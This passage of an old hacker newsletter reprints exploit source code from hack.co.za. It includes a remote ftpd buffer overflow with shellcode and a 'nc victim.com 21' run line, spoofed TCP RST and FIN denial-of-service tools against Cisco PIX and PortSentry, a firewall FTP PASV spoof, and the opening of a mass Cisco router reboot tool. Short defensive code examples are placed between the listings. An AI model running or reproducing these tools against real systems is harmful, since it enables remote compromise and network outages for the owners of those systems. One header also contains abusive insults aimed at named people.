sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
int
sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long int saddr, daddr;
char *data;
{
struct iphdr ip;
struct udphdr udp;
static char packet[8192];
char crashme[500];
int i;
ip.ihl = 5;
ip.version = 4;
ip.tos = rand () % 100;;
ip.tot_len = htons (28 + datalen);
ip.id = htons (31337 + (rand () % 100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.check = 0;
ip.saddr = saddr;
ip.daddr = daddr;
ip.check = in_cksum ((char *) &ip, sizeof (ip));
udp.source = htons (sport);
udp.dest = htons (dport);
udp.len = htons (8 + datalen);
udp.check = (short) 0;
memcpy (packet, (char *) &ip, sizeof (ip));
memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);
/* Append random garbage to the packet, without this the router
will think this is a valid probe packet and reply. */
for (i = 0; i < 500; i++)
crashme[i] = rand () % 255;
memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);
return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,
(struct sockaddr *) sin, sizeof (struct sockaddr_in)));
}
unsigned int
lookup (host)
char *host;
{
unsigned int addr;
struct hostent *he;
addr = inet_addr (host);
if (addr == -1)
{
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;
bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
}
return (addr);
}
void
main (argc, argv)
int argc;
char **argv;
{
unsigned int saddr, daddr;
struct sockaddr_in sin;
int s, i;
if (argc != 3)
errs ("Usage: %s <source_addr> <dest_addr>\n", argv[0]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if (!(saddr = lookup (argv[1])))
err ("Unable to lookup source address.\n");
if (!(daddr = lookup (argv[2])))
err ("Unable to lookup destination address.\n");
sin.sin_family = AF_INET;
sin.sin_port = 9;
sin.sin_addr.s_addr = daddr;
if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1)
{
perror ("sendpkt_udp");
err ("Error sending the UDP packet.\n");
}
}
/* www.hack.co.za [20 May]*/
@HWA
246.0 [IND] ftp-ozone.c cisco remote bug by dug song.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
dugsong@monkey.org
/*
ftp-ozone.c
Demonstrate a basic layer violation in "stateful" firewall
inspection of application data (within IP packets - @#$@#$!):
http://www.checkpoint.com/techsupport/alerts/pasvftp.html
Dug Song <dugsong@monkey.org>
Affected:
Checkpoint Software Firewall-1 4.0
Checkpoint Software Firewall-1 3.0
Cisco PIX Firewall 5.1
Cisco PIX Firewall 5.0
Cisco PIX Firewall 4.4(4)
Cisco PIX Firewall 4.3
Cisco PIX Firewall 4.2.2
Cisco PIX Firewall 4.2.1
Cisco PIX Firewall 4.1.6b
Cisco PIX Firewall 4.1.6
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#define PAD_LEN 128 /* XXX - anything on BSD, but Linux is weird */
#define GREEN "\033[0m\033[01m\033[32m"
#define OFF "\033[0m"
jmp_buf env_buf;
void
usage(void)
{
fprintf(stderr, "Usage: ftp-ozone [-w win] <ftp-server> <port-to-open>\n");
exit(1);
}
u_long
resolve_host(char *host)
{
u_long addr;
struct hostent *hp;
if (host == NULL) return (0);
if ((addr = inet_addr(host)) == -1) {
if ((hp = gethostbyname(host)) == NULL)
return (0);
memcpy((char *)&addr, hp->h_addr, sizeof(addr));
}
return (addr);
}
#define UC(b) (((int)b)&0xff)
int
ftp_pasv_reply(char *buf, int size, u_long ip, u_short port)
{
char *p, *q;
port = htons(port);
p = (char *)&ip;
q = (char *)&port;
return (snprintf(buf, size, "227 (%d,%d,%d,%d,%d,%d)\r\n",
UC(p[0]), UC(p[1]), UC(p[2]), UC(p[3]),
UC(q[0]), UC(q[1])));
}
void handle_timeout(int sig)
{
alarm(0);
longjmp(env_buf, 1);
}
void
read_server_loop(int fd, int timeout, int pretty)
{
char buf[2048];
int rlen;
if (!setjmp(env_buf)) {
signal(SIGALRM, handle_timeout);
alarm(timeout);
for (;;) {
if ((rlen = read(fd, buf, sizeof(buf))) == -1)
break;
if (pretty) {
buf[rlen] = '\0';
if (strncmp(buf, "227 ", 4) == 0)
printf("[" GREEN "%s" OFF "]\n", buf);
else printf("[%s]\n", buf);
}
else write(0, buf, rlen);
}
alarm(0);
}
}
int
main(int argc, char *argv[])
{
int c, fd, win, len;
u_long dst;
u_short dport;
struct sockaddr_in sin;
char buf[1024];
win = PAD_LEN;
while ((c = getopt(argc, argv, "w:h?")) != -1) {
switch (c) {
case 'w':
if ((win = atoi(optarg)) == 0)
usage();
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (argc != 2)
usage();
if ((dst = resolve_host(argv[0])) == 0)
usage();
if ((dport = atoi(argv[1])) == 0)
usage();
/* Connect to FTP server. */
memset(&sin, 0, sizeof(sin));
sin.sin_addr.s_addr = dst;
sin.sin_family = AF_INET;
sin.sin_port = htons(21);
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket");
exit(1);
}
if (setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &win, sizeof(win)) == -1) {
perror("setsockopt");
exit(1);
}
if (connect(fd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
perror("connect");
exit(1);
}
read_server_loop(fd, 10, 0);
/* Send padding. */
len = win - 5; /* XXX - "500 '" */
memset(buf, '.', len);
if (write(fd, buf, len) != len) {
perror("write");
exit(1);
}
/* Send faked reply. */
len = ftp_pasv_reply(buf, sizeof(buf), dst, dport);
if (write(fd, buf, len) != len) {
perror("write");
exit(1);
}
read_server_loop(fd, 5, 1);
printf("[ now try connecting to %s %d ]\n", argv[0], dport);
for (;;) {
;
}
/* NOTREACHED */
exit(0);
}
/* w00w00. */
/* www.hack.co.za [20 May]*/
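The layer violation named in the listing's header comment, seen from the inspection side, as an added example that is not part of the original code: a per-segment check that trusts any server segment beginning with "227 ", next to a tracker that reassembles the control stream and only judges complete CRLF-terminated lines. The function names and the two-segment sample (the "500 '" prefix and 128-byte window come from the listing; the rest of the server's error wording and the address 10.0.0.5 are constructed) are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct pasv_reply { unsigned char ip[4]; unsigned port; };

/* Reassembly state for the server-to-client half of one FTP control connection. */
struct ftp_ctl {
    char line[256];
    size_t used;
    int overflow; /* current line did not fit; ignore it up to the next LF */
};

/* Weak check: any server segment that starts with "227 " counts as a PASV reply. */
int naive_is_pasv(const char *seg, size_t len)
{
    return len >= 4 && memcmp(seg, "227 ", 4) == 0;
}

/* Accept only a whole line that starts with "227 " and holds six octets in parentheses. */
static int parse_227_line(const char *line, struct pasv_reply *out)
{
    unsigned v[6];
    int consumed = 0;
    const char *p = strchr(line, '(');

    if (strncmp(line, "227 ", 4) != 0 || p == NULL)
        return 0;
    /* %n is only stored if the closing ')' matched, so consumed == 0 means no ')'. */
    if (sscanf(p, "(%u,%u,%u,%u,%u,%u)%n", &v[0], &v[1], &v[2], &v[3], &v[4], &v[5],
               &consumed) != 6 || consumed == 0)
        return 0;
    for (int i = 0; i < 6; i++)
        if (v[i] > 255)
            return 0;
    for (int i = 0; i < 4; i++)
        out->ip[i] = (unsigned char)v[i];
    out->port = v[4] * 256 + v[5];
    return 1;
}

/* Feed one TCP segment of server data; returns 1 if it completed a valid 227 line. */
int ftp_ctl_feed(struct ftp_ctl *c, const char *seg, size_t len, struct pasv_reply *out)
{
    int accepted = 0;

    for (size_t i = 0; i < len; i++) {
        if (seg[i] == '\n') {
            /* A reply line ends in CRLF; only then is the buffered text judged. */
            if (!c->overflow && c->used > 0 && c->line[c->used - 1] == '\r') {
                c->line[c->used - 1] = '\0';
                if (parse_227_line(c->line, out))
                    accepted = 1;
            }
            c->used = 0;
            c->overflow = 0;
        } else if (c->used < sizeof(c->line) - 1) {
            c->line[c->used++] = seg[i];
        } else {
            c->overflow = 1;
        }
    }
    return accepted;
}

/* Constructed sample: an error reply echoing a padded command, split by a 128-byte
   window so that the echoed "227 (...)" text opens the second segment. */
#define PAD 123
static const char FORGED_TAIL[] = "227 (10,0,0,5,0,22)': command not understood.\r\n";

/* Returns 1 if the line-aware tracker accepts anything from the two-segment error reply. */
int error_echo_accepted(void)
{
    struct ftp_ctl c;
    struct pasv_reply r;
    char seg1[5 + PAD];

    memset(&c, 0, sizeof(c));
    memcpy(seg1, "500 '", 5);
    memset(seg1 + 5, '.', PAD);
    int first = ftp_ctl_feed(&c, seg1, sizeof(seg1), &r);
    int second = ftp_ctl_feed(&c, FORGED_TAIL, sizeof(FORGED_TAIL) - 1, &r);
    return first || second;
}

int main(void)
{
    printf("per-segment check on second segment: %d\n",
           naive_is_pasv(FORGED_TAIL, sizeof(FORGED_TAIL) - 1));
    printf("line-aware check on the same stream: %d\n", error_echo_accepted());
    return 0;
}
```

The tracker rejects the sample because the reassembled line begins with "500 ", while a genuine 227 reply is still accepted when it arrives split across segments.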
@HWA
247.0 [IND] reset_state.c cisco remote dos attack by vortexia.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
andrew@cnsec.co.za
/* reset_state.c (c) 2000 Citec Network Securities */
/* The code following below is copyright Citec Network Securities */
/* Code was developed for testing, and is written to compile under */
/* FreeBSD */
/*
Hi All, just a bit of a security notification.
Cisco has been informed of this problem and Im waiting for a fix for the
problem, Ive also noted that various other firewalls are effected by this
code, though if you wanna know if whatever you are running is effected,
you will have to test it.
A brief rundown of the problem.
If you run routable ips on your internal interface on your pix, and
routeable ips on your external interface, so the pix is not running nat,
the pix keeps a state table of everything going on. Anything that is not
in your state table that attempts to come in from the outside is denied,
even if there is a conduit in place to permit anything. Which means that
you have to establish a connection from your internal network to your
external network before anything external can send data back. This is a
really nice feature, unfortunatly there is a big of a bug that I found in
this. While testing on in house equipment for possible flaws, as we
continually test various products, I found the following.
On recieving a RST packet (TCP Reset) from a given host with the correct
source and destination port, the PIX will drop the state entry for that
particular connection, which means the tcp connection dies due to the fact
that no state entry the external box can no longer talk to the internal
box.
So, if we take a standard raw ip packet, give it a tcp header, and set the
source ip as a machine that your internal box is connected to, and the
destination ip as your internal machine, set the source port on the
spoofed ip as the port the person is connected to, set your destination
port on your destination ip cyclically to possible source ports on his
side, and send resets, it will drop the persons state table entry, cutting
him off from the box he is connected to.
Now, the one question I asked when I wrote this, is why does this work,
why is there no seq/ack checking on RST packets, this was answered in the
TCP RFC, saying that seq/ack numbers are not checked on RST packets,
however they are checked on FIN packets, hence using FIN packets for this
test is futile without sequence prediction code.
There is a simple work around for this problem however, and anyone wishing
to know the details of that is free to email me at andrew@cnsec.co.za for
details.
Below I have posted example code to show the exploit and how it works, and
hopefully this will be useful to someone on this list and help fix a
fairly nasty denial of service problem.
Many Thanks
Andrew Alston
Citec Network Securities (Director)
Phone: (011) 787 4241
Fax: (011) 787 4259
Email: andrew@cnsec.co.za
*/
#define __BSD_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
struct slist {
struct in_addr spoof;
struct slist *link;
}; /* Spoof list */
int
main(int argc, char *argv[])
{
int i, int2;
int sock; /* Socket stuff */
int on = 1; /* Socket stuff */
struct sockaddr_in sockstruct; /* Socket stuff */
struct ip *iphead; /* IP Header pointer */
struct tcphdr *tcphead; /* TCP Header pointer */
char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)];
/* Our reset packet */
int seq, ack; /* Sequence and Acknowledgement #'s */
FILE *spooffile; /* Spoof file */
char *buffer; /* Spoof file read buffer */
struct slist *scur, *sfirst; /* Spoof linked list pointers */
char src[20], dst[20]; /* Work around for inet_ntoa static */
/* Pointers when using printf() */
int sourcefrom, sourceto, destfrom, destto; /* CMD Line ports */
int target; /* Target address from inet_addr() */
if(argc < 6) {
fprintf(stderr, "Usage: %s spoof_file target sps spe dps dpe\n"
"target = your victim\n"
"sps = Source port start\n"
"spe = Source port end\n"
"dps = Destination port start\n"
"dpe = Destination port end\n", argv[0]);
exit(-1);
}
else {
sourcefrom = atoi(argv[3]);
sourceto = atoi(argv[4]);
destfrom = atoi(argv[5]);
destto = atoi(argv[6]);
};
if(sourcefrom > sourceto) {
printf("Error, start source port must be less than end source port\n");
exit(-1);
}
else if(destfrom > destto) {
printf("Error, start dest port must be less than end dest port\n");
exit(-1);
};
printf("Used spoof file %s\n"
"Destination: [%s] ports: [%d -> %d]\n"
"Target source ports: [%d -> %d]\n",
argv[1], argv[2], destfrom, destto, sourcefrom, sourceto);
sleep(1);
bzero(evilpacket, sizeof(evilpacket));
/* Clean our reset packet */
sfirst = malloc(sizeof(struct slist));
scur = sfirst;
scur->link = NULL; /* Setup our spoof linked list */
if(!(buffer = malloc(25))) {
perror("malloc");
exit(-1);
}; /* Allocate for read buffer */
if ((spooffile = fopen((char *) argv[1], "r")) <= 0) {
perror("fopen");
exit(-1); /* Open our spoof file */
} else {
while (fgets(buffer, 25, spooffile)) { /* Read till EOF */
if (!(inet_aton(buffer, &(scur->spoof))))
printf("Invalid address found in victim file.. ignoring\n");
else {
scur->link = malloc(sizeof(struct slist));
scur = scur->link;
scur->link = NULL; /* Cycle l.list */
}
}; /* End of while loop */
}; /* End of if {} else {} */
free(buffer); /* Free up our read buffer */
fclose(spooffile); /* Close our spoof file */
scur = sfirst; /* Set spoof list current to first */
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(-1);
} /* Allocate our raw socket */
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &on, sizeof(on)) < 0) {
perror("setsockopt");
exit(-1);
} /* Set socket options for raw iphead */
sockstruct.sin_family = AF_INET;
iphead = (struct ip *) evilpacket;
tcphead = (struct tcphdr *) (evilpacket + sizeof(struct ip));
/* Align ip and tcp headers */
iphead->ip_hl = 5; /* Ip header length is 5 */
iphead->ip_v = 4; /* ipv4 */
iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
/* Length of our total packet */
iphead->ip_id = htons(getpid()); /* Packet ID == PID # */
iphead->ip_ttl = 255; /* Time to live == 255 */
iphead->ip_p = IPPROTO_TCP; /* TCP Packet */
iphead->ip_sum = 0; /* No checksum */
iphead->ip_tos = 0; /* 0 Type of Service */
iphead->ip_off = 0; /* Offset is 0 */
tcphead->th_win = htons(512); /* TCP Window is 512 */
tcphead->th_flags = TH_RST; /* Reset packet */
tcphead->th_off = 0x50; /* TCP Offset 0x50 */
iphead->ip_dst.s_addr = inet_addr(argv[2]);
srand(getpid()); /* Seed for rand() */
while (scur->link != NULL) {
seq = rand() % time(NULL); /* Randomize our #'s */
ack = rand() % time(NULL); /* Randomize ack #'s */
sockstruct.sin_port = htons(rand() % time(NULL));
iphead->ip_src = scur->spoof; /* Set the spoofed address */
sockstruct.sin_addr = scur->spoof;
for(i = sourcefrom; i <= sourceto; i++) {
for(int2 = destfrom; int2 <= destto; int2++) {
usleep(2); /* Sleep 2 microseconds between packets */
seq += (rand() %10)+250;
ack += (rand() %10)+250;
tcphead->th_seq = htonl(seq);
/* Set sequence number */
tcphead->th_ack = htonl(ack);
/* Set ack number */
tcphead->th_dport = htons(int2);
/* Set destination port */
tcphead->th_sport = htons(i);
/* Set source port */
snprintf(src, 20, "%s", inet_ntoa(iphead->ip_src));
snprintf(dst, 20, "%s", inet_ntoa(iphead->ip_dst));
/* Copy info to src and dst for printing */
printf("TCP RESET: [%s:%d] -> [%s:%d]\n", src, ntohs(tcphead->th_sport), dst, ntohs(tcphead->th_dport));
sendto(sock, &evilpacket, sizeof(evilpacket), 0x0,
(struct sockaddr *) & sockstruct, sizeof(sockstruct));
/* Send our evil packet */
};
};
scur = scur->link; /* Cycle the spoof ips */
}
scur = sfirst;
return (1);
};
/* www.hack.co.za [20 May]*/
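Added example, not part of the original post or of any TCP stack's source: the receiver-side check that RFC 5961 (section 3.2) later specified against blind spoofed resets of the kind described above. The struct, function names and sample values are hypothetical and constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* What a receiver does with an incoming RST on an established connection. */
enum rst_action {
    RST_DROP = 0,          /* sequence number outside the receive window */
    RST_CHALLENGE_ACK = 1, /* in window but not RCV.NXT: ask the real peer to confirm */
    RST_ACCEPT = 2         /* exactly RCV.NXT: tear the connection down */
};

/* Receive-side state of one connection (hypothetical struct). */
struct rcv_state {
    uint32_t rcv_nxt; /* next sequence number expected from the peer */
    uint32_t rcv_wnd; /* current receive window in bytes */
};

/* Is seq inside [rcv_nxt, rcv_nxt + rcv_wnd)?  Unsigned subtraction wraps
 * modulo 2^32, so this stays correct when the window straddles 0xFFFFFFFF. */
static int seq_in_window(const struct rcv_state *s, uint32_t seq)
{
    return (uint32_t)(seq - s->rcv_nxt) < s->rcv_wnd;
}

/* Decide what to do with a RST carrying sequence number seg_seq. */
enum rst_action classify_rst(const struct rcv_state *s, uint32_t seg_seq)
{
    if (seg_seq == s->rcv_nxt)
        return RST_ACCEPT;
    if (seq_in_window(s, seg_seq))
        return RST_CHALLENGE_ACK;
    return RST_DROP;
}

/* Classify a batch of RSTs; counts[] is indexed by enum rst_action. */
void tally_rsts(const struct rcv_state *s, const uint32_t *seqs, size_t n,
                unsigned counts[3])
{
    size_t i;

    counts[RST_DROP] = counts[RST_CHALLENGE_ACK] = counts[RST_ACCEPT] = 0;
    for (i = 0; i < n; i++)
        counts[classify_rst(s, seqs[i])]++;
}

/* Constructed sample: a connection whose window wraps past 2^32. */
static const struct rcv_state SAMPLE_CONN = { 0xFFFFFF00u, 0x200u };

/* Constructed sample: sequence numbers of six incoming RST segments. */
static const uint32_t SAMPLE_RST_SEQS[] = {
    0xFFFFFF00u, /* exactly RCV.NXT */
    0xFFFFFF01u, /* in window */
    0x00000010u, /* in window, after the wrap */
    0x00000100u, /* first byte past the window */
    0x12345678u, /* arbitrary guess */
    0xFFFFFEFFu  /* one byte before RCV.NXT */
};
```

A stack that skips this check treats all six sample segments as valid resets; with it, only the exact match closes the connection and the two in-window guesses merely trigger an ACK to the real peer.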
@HWA
248.0 [IND] ftpexp.c (Version 6.2/Linux-0.10) ftpd overflow by digit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
teddi@linux.is
/*
* FTP server (Version 6.2/OpenBSD/Linux-0.10) and 6.3 ??
* getwd() overflow. linux exploit, remote penetration.
*
* author: DiGiT - teddi@linux.is
*
* greets: p0rtal && \x90 & me for discovering this bug.
* big thx to duke for ADMwuftp.
* #hax, #!ADM
* Run like: (./ftpexp 0 dir ; cat) | nc victim.com 21
* offset vary from -500 - +500
* PRIVATE EXPLOIT$#%#%#$
*/
#include <stdio.h>
#include <string.h>
// need to find for other, tested of slack 3.6.
// #define RET 0xbfffec5c
#define RET 0xbfffeb30
#define USERNAME "ftp"
#define PASSWORD "lamer@"
char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\x90\x90\x31\xc0\x31\xdb\xb0\x17"
"\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
"\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"
"\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0"
"\x27\x8d\x5e\x05\xfe\xc5\xb1\xed"
"\xcd\x80\x31\xc0\x8d\x5e\x05\xb0"
"\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1"
"\xd0\xff\xf7\xdb\x31\xc9\xb1\x10"
"\x56\x01\xce\x89\x1e\x83\xc6\x03"
"\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10"
"\xcd\x80\x31\xc0\x88\x46\x07\x89"
"\x76\x08\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
"\x80\xe8\xac\xff\xff\xff";
void mkd(char *dir)
{
char blah[1024], *p;
int n;
bzero(blah, sizeof(blah));
p = blah;
for(n=0; n<strlen(dir); n++){
if(dir[n] == '\xff'){
*p = '\xff';
p++;
}
*p = dir[n];
p++;
}
printf("MKD %s\r\n", blah);
printf("CWD %s\r\n", blah);
}
void
main (int argc, char *argv[])
{
char *buf;
char buf2[200];
char buf1[600];
char dir2[256];
char *p;
char *q;
char tmp[256];
int a;
int offset;
int i;
if (argc > 1) offset = atoi(argv[1]);
else offset = 0;
fprintf(stderr, "ret-addr = 0x%x\n", RET + offset);
fprintf(stderr, "shell size = %d\n", sizeof(shellcode));
dir2[231] = '\0';
memset(dir2, '\x90', 230);
printf("user %s\r\n", USERNAME);
printf("pass %s\r\n", PASSWORD);
printf("cwd %s\r\n", argv[2]);
memset(buf1, 0x90, 600);
p = &buf1[sizeof(argv[2])];
q = &buf1[599];
*q = '\x00';
while(p <= q) {
strncpy(tmp, p, 100);
mkd(tmp);
p+=100; }
mkd(dir2);
mkd(shellcode);
mkd("bin");
mkd("sh");
memset(buf2, 0x90, 100);
// var 96
for(i=4; i<96; i+=4)
*(long *)&buf2[i] = RET + offset;
p = &buf2[0];
q = &buf2[99];
strncpy(tmp, p, 100);
mkd(tmp);
printf("pwd\r\n");
}
/* www.hack.co.za [20 May]*/
@HWA
249.0 [IND] killsentry.c linux/misc remote port sentry killer by vortexia.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
andrew@cnsec.co.za
/* killsentry.c (c) 1999 Vortexia / Andrew Alston
Excuse the crappy coding, this code was written when I was very bored,
had nothing better to do, and felt like proving the point that automatic
firewalling is a bad idea. The code spoofs FIN packets from sequential
internet hosts, starting at 1.0.0.0 and going right through to
255.255.255.255, sending 15 packets from each, one packet each to port
100 to 115. Feel free to modify this code, if you use the code for
anything, please give me credit where it is due.
I hold no responsibility for anything this code is used for, I give no
guarantees that this code works, and I hold no responsibility for
anything this code does to any system you run it on. If you screw up with
it, it's your problem, not mine.
The code compiles 100% fine with no warnings on FreeBSD 3.2, I don't know
about any other platforms or systems.
Greets and shoutouts:
Wyze1 - Thanks for the moral support, here is something you may use in
Forbidden Knowledge
Sniper - My partner in crime, you rock
Timewiz - What can I say, thanks for ideas for projects still coming
Moe1 - For all the information Ive had from you - Its appreciated
Uglykidjoe - For things said and done - I owe you
Hotmetal - A general greet
Bretton Vine - Dont worry the underground you hate so much still loves you
Everyone else in #hack on irc.electrocity.com - You guys rock
Curses, fuckoffs, and the like -
Logik - Get a clue, skript kiddie life aint the way
Gaspode - I dont think I even need this - a major FUCK YOU
and I hope you get castrated with a rusty spoon -
take your god like attitude and shove it up your ass
Sunflower - May you fall pregnant to one of the many ircops you screw
Anyone else that I dislike but cant think of right now - FUCK YOU
Anyone who dislikes me - FUCK YOU
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#define TARGETHOST "YOURTARGETHERE"
int main() {
int octet1, octet2, octet3, octet4;
int i;
int sock;
int on = 1;
struct sockaddr_in sockstruct;
struct ip *iphead;
struct tcphdr *tcphead;
char ipkill[20];
char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)];
struct in_addr spoof, target;
int seq, ack;
bzero(&evilpacket, sizeof(evilpacket));
// Very bad way to generate sequence numbers
srand(getpid());
seq = rand()%time(NULL);
ack = rand()%time(NULL);
target.s_addr=inet_addr(TARGETHOST);
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(-1);
}
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) {
perror("setsockopt");
exit(-1);
}
sockstruct.sin_family = AF_INET;
iphead = (struct ip *)evilpacket;
tcphead = (struct tcphdr *)(evilpacket + sizeof(struct ip));
iphead->ip_hl = 5;
iphead->ip_v = 4;
iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
iphead->ip_id = htons(getpid());
iphead->ip_ttl = 255;
iphead->ip_p = IPPROTO_TCP;
iphead->ip_dst = target;
iphead->ip_sum = 0;
iphead->ip_tos = 0;
iphead->ip_off = 0;
tcphead->th_sport = htons(80);
tcphead->th_seq = htonl(seq);
tcphead->th_ack = htonl(ack);
tcphead->th_win = htons(512);
tcphead->th_flags = TH_FIN;
tcphead->th_off = 0x50;
for(octet1 = 1; octet1 <= 255; octet1++)
for(octet2 = 0; octet2 <= 255; octet2++)
for(octet3 = 0; octet3 <= 255; octet3++)
for(octet4 = 0; octet4 <= 255; octet4++) {
bzero(ipkill, 20);
sprintf(ipkill, "%d.%d.%d.%d", octet1, octet2, octet3, octet4);
for(i = 100; i <= 115; i++) {
tcphead->th_dport = htons(i);
sockstruct.sin_port = htons(i);
spoof.s_addr = inet_addr(ipkill);
iphead->ip_src = spoof;
sockstruct.sin_addr = spoof;
sendto(sock,&evilpacket,sizeof(evilpacket),0x0,(struct
sockaddr *)&sockstruct, sizeof(sockstruct));
}
}
return(1);
};
/* www.hack.co.za [20 May]*/
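The point made above, that a blocker which reacts to unauthenticated packets can be steered by anyone able to forge a source address, as an added example (not part of the original post and not PortSentry's code): a hypothetical auto-block policy that ignores sources it has not verified, keeps a never-block list and caps its table. All names and addresses are constructed.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_BLOCKS 4 /* tiny on purpose so the cap is easy to exercise */
#define IP4(a, b, c, d) (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | \
                         ((uint32_t)(c) << 8) | (uint32_t)(d))

enum verdict {
    V_IGNORE_UNVERIFIED,  /* source never completed a handshake: log only */
    V_IGNORE_ALLOWLISTED, /* source is on the never-block list */
    V_ALREADY_BLOCKED,
    V_TABLE_FULL,         /* cap reached: alert a human instead of blocking */
    V_BLOCKED
};

struct cidr { uint32_t net; uint32_t mask; };

struct probe_event {
    uint32_t src;       /* claimed source address, host byte order */
    uint16_t dport;     /* monitored port that was touched */
    int handshake_done; /* 1 only if src completed a TCP three-way handshake */
};

struct blocker {
    const struct cidr *never_block;
    size_t n_never;
    uint32_t blocked[MAX_BLOCKS];
    size_t n_blocked;
};

/* Constructed sample: addresses the host must always be able to reach. */
const struct cidr SAMPLE_NEVER_BLOCK[] = {
    { IP4(192, 0, 2, 1), 0xFFFFFFFFu },   /* default gateway */
    { IP4(198, 51, 100, 0), 0xFFFFFF00u } /* resolvers and mail relays */
};

static int in_never_block(const struct blocker *b, uint32_t ip)
{
    size_t i;

    for (i = 0; i < b->n_never; i++)
        if ((ip & b->never_block[i].mask) == b->never_block[i].net)
            return 1;
    return 0;
}

static int already_blocked(const struct blocker *b, uint32_t ip)
{
    size_t i;

    for (i = 0; i < b->n_blocked; i++)
        if (b->blocked[i] == ip)
            return 1;
    return 0;
}

/* Decide whether one probe event may add a firewall block. */
enum verdict handle_probe(struct blocker *b, const struct probe_event *ev)
{
    /* A lone FIN, SYN or UDP datagram proves nothing about who sent it. */
    if (!ev->handshake_done)
        return V_IGNORE_UNVERIFIED;
    if (in_never_block(b, ev->src))
        return V_IGNORE_ALLOWLISTED;
    if (already_blocked(b, ev->src))
        return V_ALREADY_BLOCKED;
    if (b->n_blocked == MAX_BLOCKS)
        return V_TABLE_FULL;
    b->blocked[b->n_blocked++] = ev->src;
    return V_BLOCKED;
}

/* Feed the policy the traffic pattern described above (one unverified FIN
 * per port 100..115 from each of n_sources consecutive addresses), without
 * sending anything.  Returns the number of block entries afterwards. */
size_t replay_spoofed_fin_sweep(struct blocker *b, uint32_t first_src,
                                uint32_t n_sources)
{
    uint32_t s;
    uint16_t port;

    for (s = 0; s < n_sources; s++)
        for (port = 100; port <= 115; port++) {
            struct probe_event ev = { first_src + s, port, 0 };
            (void)handle_probe(b, &ev);
        }
    return b->n_blocked;
}
```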
@HWA
249.0 [IND] cisconuke.c cisco http mass dos tool. ;))
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/routers/cisco/cisconuke.c
NOTE: Distributed by hack.co.za don't complain to me! - Ed
/*
- PRIVATE Do NOT distribute PRIVATE -
Cisco IOS deficiency (web-server interface) allows an arbitrary
router to be rebooted.
1. Create an IP address list (or hostnames).
2. gcc -o cisconuke cisconuke.c
3. ./cisconuke ip-address-list
4. If the target's a Cisco with open TCP/80, it goez b00m.
We use a timeout because, in the event that a host resolves but is
down, waiting for ETIMEDOUT would slow your DOSing down. Adjust if
necessary (slow links etc).
Comment out the VERBOSE #define if you don't want to see what's
happening.
*/
#define VERBOSE
#define TIMEOUT 10
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
